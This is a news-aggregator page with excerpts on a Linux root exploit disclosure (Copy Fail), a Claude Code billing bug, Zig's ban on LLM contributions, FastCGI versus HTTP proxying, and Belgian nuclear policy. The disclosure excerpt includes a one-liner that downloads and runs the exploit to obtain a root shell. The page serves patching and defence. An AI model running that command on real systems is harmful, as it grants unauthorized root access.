10 interesting stories served every morning and every evening.

Copy Fail — 732 Bytes to Root

copy.fail

CVE-2026 – 31431

100% re­li­able

every dis­tro since 2017

con­tainer es­cape prim­i­tive

732 bytes

found by Xint Code

Most Linux LPEs need a race win­dow or a ker­nel-spe­cific off­set.Copy Fail is a straight-line logic flaw — it needs nei­ther.The same 732-byte Python script roots every Linux dis­tri­b­u­tion shipped since 2017.

One logic bug in au­thencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently ex­ploitable for nearly a decade.

The demo

Same script, four dis­tri­b­u­tions, four root shells — in one take. The same ex­ploit bi­nary works un­mod­i­fied on every Linux dis­tri­b­u­tion.

tmux — copy fail demo

live

Who is af­fected

If your ker­nel was built be­tween 2017 and the patch — which cov­ers es­sen­tially every main­stream Linux dis­tri­b­u­tion — you’re in scope.

Copy Fail re­quires only an un­priv­i­leged lo­cal user ac­count — no net­work ac­cess, no ker­nel de­bug­ging fea­tures, no pre-in­stalled prim­i­tives. The ker­nel crypto API (AF_ALG) ships en­abled in es­sen­tially every main­stream dis­tro’s de­fault con­fig, so the en­tire 2017 → patch win­dow is in play out of the box.

Distributions we di­rectly ver­i­fied:

These are what we tested di­rectly. Other dis­tri­b­u­tions run­ning af­fected ker­nels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the em­bed­ded crowd — be­have the same. Tested it else­where? Open an is­sue to add to the list.

Should you patch first?

High

Multi-tenant Linux hosts

Shared dev boxes, shell-as-a-ser­vice, jump hosts, build servers — any­where mul­ti­ple users share a ker­nel.

any user be­comes root

High

Kubernetes / con­tainer clus­ters

The page cache is shared across the host. A pod with the right prim­i­tives com­pro­mises the node and crosses ten­ant bound­aries.

cross-con­tainer, cross-ten­ant

High

CI run­ners & build farms

GitHub Actions self-hosted run­ners, GitLab run­ners, Jenkins agents — any­thing that ex­e­cutes un­trusted PR code as a reg­u­lar user, on a shared ker­nel.

a PR be­comes root on the run­ner

High

Cloud SaaS run­ning user code

Notebook hosts, agent sand­boxes, server­less func­tions, any ten­ant-sup­plied con­tainer or script.

ten­ant be­comes host root

Medium

Standard Linux servers

Single-tenant pro­duc­tion where only your team has shell ac­cess.

in­ter­nal LPE; chains with web RCE or stolen creds

Lower

Single-user lap­tops & work­sta­tions

You’re al­ready the only user. The bug does­n’t grant re­mote at­tack­ers ac­cess by it­self, but any lo­cal code ex­e­cu­tion be­comes root.

post-ex­ploita­tion step-up

Exploit

The PoC is pub­lished so de­fend­ers can ver­ify their own sys­tems and val­i­date ven­dor patches.

Use re­spon­si­bly. Run only on sys­tems you own or have writ­ten au­tho­riza­tion to test. The script ed­its the page cache of a se­tuid bi­nary; the change is not per­sis­tent across re­boot, but the re­sult­ing root shell is real. Don’t run it on pro­duc­tion.

copy­_­fail_­exp.py 732 B

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Tar­gets /usr/bin/su by de­fault; pass an­other se­tuid bi­nary as argv[1].

sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952d­f05c719aa3911687f9

Quick run:

$ curl https://​copy.fail/​exp | python3 && su

# id

uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://​github.com/​the­ori-io/​copy-fail-CVE-2026 – 31431

Mitigation

Patch first. Update your dis­tri­b­u­tion’s ker­nel pack­age to one that in­cludes main­line com­mit a664bf3d603d — it re­verts the 2017 al­gif_aead in-place op­ti­miza­tion, so page-cache pages can no longer end up in the writable des­ti­na­tion scat­terlist. Most ma­jor dis­tri­b­u­tions are ship­ping the fix now.

Before you can patch: dis­able the al­gif_aead mod­ule.

# echo install al­gif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf

# rm­mod al­gif_aead 2>/dev/null || true

What does this break? For the vast ma­jor­ity of sys­tems — noth­ing mea­sur­able.

Will not af­fect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-ker­nel TLS, OpenSSL/GnuTLS/NSS de­fault builds, SSH, ker­nel keyring crypto. These all use the in-ker­nel crypto API di­rectly — they don’t go through AF_ALG.

May af­fect: user­space specif­i­cally con­fig­ured to use AF_ALG — e.g. OpenSSL with the afalg en­gine ex­plic­itly en­abled, some em­bed­ded crypto of­fload paths, or ap­pli­ca­tions that bind aead/​skci­pher/​hash sock­ets di­rectly. Check with lsof | grep AF_ALG or ss -xa if in doubt.

Performance: AF_ALG is a user­space front door to the ker­nel crypto API. Disabling it does not slow any­thing that was­n’t al­ready call­ing it; for the things that were, per­for­mance falls back to a nor­mal user­space crypto li­brary, which is what al­most every­thing else al­ready does.

For un­trusted work­loads (containers, sand­boxes, CI), block AF_ALG socket cre­ation via sec­comp re­gard­less of patch state.

FAQ

Loading FAQ…

Disclosure time­line

2026 – 03-23Reported to Linux ker­nel se­cu­rity team

2026 – 03-24Initial ac­knowl­edg­ment

2026 – 03-25Patches pro­posed and re­viewed

2026 – 04-01Patch com­mit­ted to main­line

2026 – 04-22CVE-2026 – 31431 as­signed

2026 – 04-29Public dis­clo­sure (https://​copy.fail/)

Xint Code

Is your soft­ware AI-era safe?

Copy Fail was sur­faced by Xint Code about an hour of scan time against the Linux crypto/ sub­sys­tem. Full root cause, di­a­grams, and the op­er­a­tor prompt that found it are in the Xint blog write-up.

The same scan also sur­faced other high-sever­ity bugs, still in co­or­di­nated dis­clo­sure. Xint Code au­dits pro­duc­tion code­bases the same way — one op­er­a­tor prompt, no har­ness­ing, pri­or­i­tized find­ings with trig­ger and im­pact nar­ra­tives.

Track record

0-day RCE

ZeroDay Cloud

Swept the data­base cat­e­gory — Redis, PostgreSQL, MariaDB. Zero hu­man in­ter­ven­tion.

Top 3

DARPA AIxCC

Finalist in the AI Cyber Challenge hosted by DoD DARPA.

DEF CON CTF

Most-winning team in DEF CON CTF his­tory.

HERMES.md in git commit messages causes requests to route to extra usage billing instead of plan quota

github.com

Summary

When a git repos­i­to­ry’s re­cent com­mit his­tory con­tains the case-sen­si­tive string HERMES.md, Claude Code routes API re­quests to extra us­age” billing in­stead of the in­cluded Max plan quota. This silently burned through $200 in ex­tra us­age cred­its while my Max 20x plan ca­pac­ity re­mained largely un­touched (13% weekly us­age).

Environment

Claude Code v2.1.119

ma­cOS (Apple Silicon)

Max 20x plan ($200/month)

Model: claude-opus-4 – 6[1m] (also re­pro­duces with claude-opus-4 – 7)

Reproduction

Minimal re­pro­duc­tion — no pro­ject files needed:

# This FAILS with out of ex­tra us­age” (routes to ex­tra us­age billing)

mkdir /tmp/test-fail && cd /tmp/test-fail

git init && echo test > test.txt && git add . && git com­mit -m add HERMES.md”

claude -p say hello” –model claude-opus-4 – 6[1m]”

# => API Error: 400 You’re out of ex­tra us­age…”

# This WORKS (routes to plan quota)

mkdir /tmp/test-pass && cd /tmp/test-pass

git init && echo test > test.txt && git add . && git com­mit -m add her­mes.md”

claude -p say hello” –model claude-opus-4 – 6[1m]”

# => Hello!”

# Cleanup

rm -rf /tmp/test-fail /tmp/test-pass

The trig­ger is the string HERMES.md in git com­mit mes­sages — not the pres­ence of a file with that name on disk. Claude Code in­cludes re­cent com­mits in its sys­tem prompt, and some­thing server-side routes the re­quest dif­fer­ently when this string is pre­sent.

What trig­gers it vs. what does­n’t

Impact

$200.98 in ex­tra us­age cred­its con­sumed for re­quests that should have been cov­ered by the in­cluded Max 20x plan quota

Multiple pro­jects be­came com­pletely un­us­able once ex­tra us­age was de­pleted, while the plan dash­board showed 86%+ re­main­ing weekly ca­pac­ity

The er­ror mes­sage (“out of ex­tra us­age”) gives no in­di­ca­tion that con­tent-based rout­ing is the cause, mak­ing this ex­tremely dif­fi­cult to di­ag­nose

Any user with HERMES.md in re­cent git com­mits would silently have their us­age billed to ex­tra cred­its

Expected be­hav­ior

API re­quest billing should not de­pend on the con­tent of git com­mit mes­sages in the sys­tem prompt. All re­quests from a Max plan sub­scriber should route to the in­cluded plan quota first.

How I found this

Systematic bi­nary search: cloning af­fected re­pos, test­ing or­phan branches, then iso­lat­ing in­di­vid­ual com­mit mes­sage strings un­til HERMES.md was iden­ti­fied as the ex­act trig­ger.

Just a moment...

neal.fun

Glenn Meder (@GlennMeder)

xcancel.com

JavaScript is not available.

x.com

JavaScript is not avail­able. We’ve de­tected that JavaScript is dis­abled in this browser. Please en­able JavaScript or switch to a sup­ported browser to con­tinue us­ing x.com. You can see a list of sup­ported browsers in our Help Center.

Something went wrong, but don’t fret — let’s give it an­other shot.

Some pri­vacy re­lated ex­ten­sions may cause is­sues on x.com. Please dis­able them and try again.

openai.com

The Zig project's rationale for their firm anti-AI contribution policy

simonwillison.net

Zig has one of the most strin­gent anti-LLM poli­cies of any ma­jor open source pro­ject:

No LLMs for is­sues.

No LLMs for pull re­quests.

No LLMs for com­ments on the bug tracker, in­clud­ing trans­la­tion. English is en­cour­aged, but not re­quired. You are wel­come to post in your na­tive lan­guage and rely on oth­ers to have their own trans­la­tion tools of choice to in­ter­pret your words.

No LLMs for is­sues.

No LLMs for pull re­quests.

No LLMs for com­ments on the bug tracker, in­clud­ing trans­la­tion. English is en­cour­aged, but not re­quired. You are wel­come to post in your na­tive lan­guage and rely on oth­ers to have their own trans­la­tion tools of choice to in­ter­pret your words.

The most promi­nent pro­ject writ­ten in Zig may be the Bun JavaScript run­time, which was ac­quired by Anthropic in December 2025 and, un­sur­pris­ingly, makes heavy use of AI as­sis­tance.

Bun op­er­ates its own fork of Zig, and re­cently achieved a 4x per­for­mance im­prove­ment on Bun com­pile af­ter adding parallel se­man­tic analy­sis and mul­ti­ple code­gen units to the llvm back­end”. Here’s that code. But @bunjavascript says:

We do not cur­rently plan to up­stream this, as Zig has a strict ban on LLM-authored con­tri­bu­tions.

We do not cur­rently plan to up­stream this, as Zig has a strict ban on LLM-authored con­tri­bu­tions.

(Update: here’s a Zig core con­trib­u­tor pro­vid­ing de­tails on why they would­n’t ac­cept that par­tic­u­lar patch in­de­pen­dent of the LLM is­sue - par­al­lel se­man­tic analy­sis is a long planned fea­ture but has im­pli­ca­tions for the Zig lan­guage it­self”.)

In Contributor Poker and Zig’s AI Ban (via Lobste.rs) Zig Software Foundation VP of Community Loris Cro ex­plains the ra­tio­nale for this strict ban. It’s the best ar­tic­u­la­tion I’ve seen yet for a blan­ket ban on LLM-assisted con­tri­bu­tions:

In suc­cess­ful open source pro­jects you even­tu­ally reach a point where you start get­ting more PRs than what you’re ca­pa­ble of pro­cess­ing. Given what I men­tioned so far, it would make sense to stop ac­cept­ing im­per­fect PRs in or­der to max­i­mize ROI from your work, but that’s not what we do in the Zig pro­ject. Instead, we try our best to help new con­trib­u­tors to get their work in, even if they need some help get­ting there. We don’t do this just be­cause it’s the right” thing to do, but also be­cause it’s the smart thing to do.

In suc­cess­ful open source pro­jects you even­tu­ally reach a point where you start get­ting more PRs than what you’re ca­pa­ble of pro­cess­ing. Given what I men­tioned so far, it would make sense to stop ac­cept­ing im­per­fect PRs in or­der to max­i­mize ROI from your work, but that’s not what we do in the Zig pro­ject. Instead, we try our best to help new con­trib­u­tors to get their work in, even if they need some help get­ting there. We don’t do this just be­cause it’s the right” thing to do, but also be­cause it’s the smart thing to do.

Zig val­ues con­trib­u­tors over their con­tri­bu­tions. Each con­trib­u­tor rep­re­sents an in­vest­ment by the Zig core team - the pri­mary goal of re­view­ing and ac­cept­ing PRs is­n’t to land new code, it’s to help grow new con­trib­u­tors who can be­come trusted and pro­lific over time.

LLM as­sis­tance breaks that com­pletely. It does­n’t mat­ter if the LLM helps you sub­mit a per­fect PR to Zig - the time the Zig team spends re­view­ing your work does noth­ing to help them add new, con­fi­dent, trust­wor­thy con­trib­u­tors to their over­all pro­ject.

Loris ex­plains the name here:

The rea­son I call it contributor poker” is be­cause, just like peo­ple say about the ac­tual card game, you play the per­son, not the cards”. In con­trib­u­tor poker, you bet on the con­trib­u­tor, not on the con­tents of their first PR.

The rea­son I call it contributor poker” is be­cause, just like peo­ple say about the ac­tual card game, you play the per­son, not the cards”. In con­trib­u­tor poker, you bet on the con­trib­u­tor, not on the con­tents of their first PR.

This makes a lot of sense to me. It re­lates to an idea I’ve seen cir­cu­lat­ing else­where: if a PR was mostly writ­ten by an LLM, why should a pro­ject main­tainer spend time re­view­ing and dis­cussing that PR as op­posed to fir­ing up their own LLM to solve the same prob­lem?

Vercel Security Checkpoint

www.noctua.at

FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies

www.agwa.name

HTTP re­verse prox­y­ing is a mine­field.

Just the other week, a re­searcher dis­closed a de­sync

vul­ner­a­bil­ity in Discord’s me­dia proxy that al­lowed spy­ing on pri­vate

at­tach­ments. This is not un­usual; these vul­ner­a­bil­i­ties just keep com­ing.

The prob­lem is the wide­spread use of HTTP as the pro­to­col be­tween re­verse prox­ies

and back­ends, even though it’s un­fit for the job.

But we don’t have to use HTTP here.

There’s a 30-year-old pro­to­col for proxy-to-back­end com­mu­ni­ca­tion

that avoids HTTPs pit­falls. It’s called FastCGI,

and its spec­i­fi­ca­tion was re­leased 30 years ago to­day.

FastCGI is a Wire Protocol, not a Process Model

It’s true that some web servers can au­to­mat­i­cally spawn FastCGI processes

to han­dle re­quests for files with the .fcgi ex­ten­sion, much like they

would for .cgi files. But you don’t have to use FastCGI this way - you

can also use the FastCGI pro­to­col just like HTTP, with re­quests sent

over a TCP or UNIX socket to a long-run­ning dae­mon that han­dles them as if they

were HTTP re­quests.

For ex­am­ple, in Go all you have to do is im­port the

net/​http/​fcgi

stan­dard li­brary pack­age and re­place http.Serve with fcgi.Serve:

Go HTTP

l, _ := net.Lis­ten(“tcp”, 127.0.0.1:8080″)

http.Serve(l, han­dler)

Go FastCGI

l, _ := net.Lis­ten(“tcp”, 127.0.0.1:8080″)

fcgi.Serve(l, han­dler)

Everything else about your app stays the same - even your han­dler, which con­tin­ues to use the stan­dard

http.Re­spon­seWriter and http.Re­quest types.

Popular prox­ies like Apache, Caddy, ng­inx, and HAProxy sup­port FastCGI back­ends, and the con­fig­u­ra­tion is sim­ple:

ng­inx HTTP

prox­y_­pass http://​lo­cal­host:8080;

ng­inx FastCGI

fastc­gi_­pass lo­cal­host:8080;

in­clude fastc­gi_­params;

Apache HTTP

ProxyPass / http://​lo­cal­host:8080/

Apache FastCGI

ProxyPass / fcgi://​lo­cal­host:8080/

Caddy HTTP

re­verse_proxy lo­cal­host:8080 {

transport http {

}

}

Caddy FastCGI

re­verse_proxy lo­cal­host:8080 {

transport fastcgi {

}

}

HAProxy HTTP

back­end ap­p_back­end

server s1 lo­cal­host:8080

HAProxy FastCGI

fcgi-app fc­gi_app

docroot /

back­end ap­p_back­end

use-fcgi-app fc­gi_app

server s1 lo­cal­host:8080 proto fcgi

Why HTTP Sucks for Reverse Proxies: Desync Attacks / Request Smuggling

HTTP/1.1 has the tragic prop­erty of look­ing sim­ple on the sur­face

(it’s just text!) but ac­tu­ally be­ing a night­mare to parse ro­bustly.

There are so many dif­fer­ent ways to for­mat the same HTTP mes­sage,

and there are too many edge cases and am­bi­gu­i­ties for im­ple­men­ta­tions to han­dle con­sis­tently.

As a re­sult, no two HTTP/1.1 im­ple­men­ta­tions

are ex­actly the same, and the same mes­sage can be parsed dif­fer­ently by dif­fer­ent parsers.

The most se­ri­ous prob­lem is that there is no ex­plicit fram­ing of HTTP

mes­sages - the mes­sage it­self de­scribes where it ends, and there are

mul­ti­ple ways for a mes­sage to do that, all with their own edge cases.

Implementations can dis­agree about where a mes­sage ends,

and con­se­quently, where the next mes­sage be­gins. This is the foun­da­tion of

HTTP de­sync at­tacks,

also known as re­quest smug­gling, wherein a re­verse proxy and a back­end dis­agree about

the bound­aries be­tween HTTP mes­sages, caus­ing all sorts of night­mare

se­cu­rity is­sues, such as the Discord vul­ner­a­bil­ity I linked above.

A lot of peo­ple seem to think you can just patch the parser di­ver­gences,

but this is a los­ing strat­egy. James Kettle

just keeps find­ing new ones. After

find­ing an­other batch last year,

he de­clared HTTP/1.1 must die”.

HTTP/2, when con­sis­tently used be­tween the proxy and back­end, fixes de­sync by putting clear bound­aries around mes­sages, but FastCGI

has been do­ing that since 1996 with a sim­pler pro­to­col.

For con­text, ng­inx has sup­ported FastCGI back­ends since its first re­lease,

but only got sup­port for HTTP/2 back­ends in late 2025. Apache’s sup­port for HTTP/2 back­ends is still experimental”.

Why HTTP Sucks for Reverse Proxies: Untrusted Headers

If de­sync at­tacks were the only prob­lem, you could just use HTTP/2 and call it

a day. Unfortunately, there’s an­other prob­lem: HTTP has no ro­bust way

for the proxy to con­vey trusted in­for­ma­tion about the re­quest, such as the real client IP ad­dress,

au­then­ti­cated user­name (if the proxy han­dles au­then­ti­ca­tion), or client cer­tifi­cate de­tails

(if mTLS is used).

The only op­tion is to stick this in­for­ma­tion in HTTP head­ers, along­side

the head­ers prox­ied from the client, with­out a clear struc­tural dis­tinc­tion be­tween trusted

head­ers from the proxy and un­trusted head­ers from a po­ten­tial at­tacker.

For ex­am­ple, the X-Real-IP header is of­ten used

to con­vey the clien­t’s real IP ad­dress. In the­ory, if your proxy cor­rectly deletes all in­stances

of the X-Real-IP header (not just the first, and in­clud­ing case vari­a­tions like x-REaL-ip) be­fore adding its own, you’re safe.

In prac­tice, this is a mine­field

and there are an aw­ful lot of ways your back­end can end up trust­ing at­tacker-con­trolled data.

Your proxy re­ally needs to delete not just X-Real-IP, but any header that’s used for this sort of thing,

just in case some part of your stack re­lies on it with­out your knowl­edge.

For ex­am­ple, the Chi mid­dle­ware de­ter­mines the clien­t’s real IP ad­dress by look­ing at the

True-Client-IP header first. Only if True-Client-IP does­n’t ex­ist does it use X-Real-IP.

Belgium stops decommissioning nuclear power plants

dpa-international.com

30.04.2026, 11:37 Uhr

Belgium will stop de­com­mis­sion­ing its nu­clear power plants, Prime Minister Bart De Wever an­nounced on Thursday.

The gov­ern­ment is go­ing to ne­go­ti­ate with op­er­a­tor ENGIE over the na­tion­al­iza­tion of the plants, De Wever said.

This gov­ern­ment chooses safe, af­ford­able, and sus­tain­able en­ergy. With less de­pen­dence on fos­sil im­ports and more con­trol over our own sup­ply,” he wrote on X.

ENGIE said it signed a let­ter of in­tent with the Belgian gov­ern­ment on ex­clu­sive ne­go­ti­a­tions.

The agree­ment cov­ers the po­ten­tial ac­qui­si­tion of the com­plete nu­clear fleet of seven re­ac­tors, the as­so­ci­ated per­son­nel, all nu­clear sub­sidiaries, as well as all as­so­ci­ated as­sets and li­a­bil­i­ties, in­clud­ing de­com­mis­sion­ing and dis­man­tling oblig­a­tions,” a press re­lease said.

A ba­sic agree­ment is ex­pected to be reached by October, it said.

Belgium orig­i­nally de­cided in 2003 to phase-out nu­clear power pro­duc­tion by 2025, but po­lit­i­cal de­bate and en­ergy se­cu­rity con­cerns have led to de­lays.

Last year the Belgian par­lia­ment voted by a large ma­jor­ity to end the nu­clear phase-out. De Wever’s gov­ern­ment also aims to build new nu­clear power plants.

Belgium has seven nu­clear re­ac­tors at two dif­fer­ent sites, al­though three re­ac­tors have al­ready been taken off the grid.

The fate of the age­ing in­stal­la­tions has been de­bated for decades. The coun­try is cur­rently heav­ily de­pen­dent on gas im­ports to cover its elec­tric­ity needs as it has been strug­gling to ex­pand re­new­able power gen­er­a­tion sig­nif­i­cantly.

Bart De Wever on X

ENGIE press re­lease

(c) 2026 dpa Deutsche Presse Agentur GmbH

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.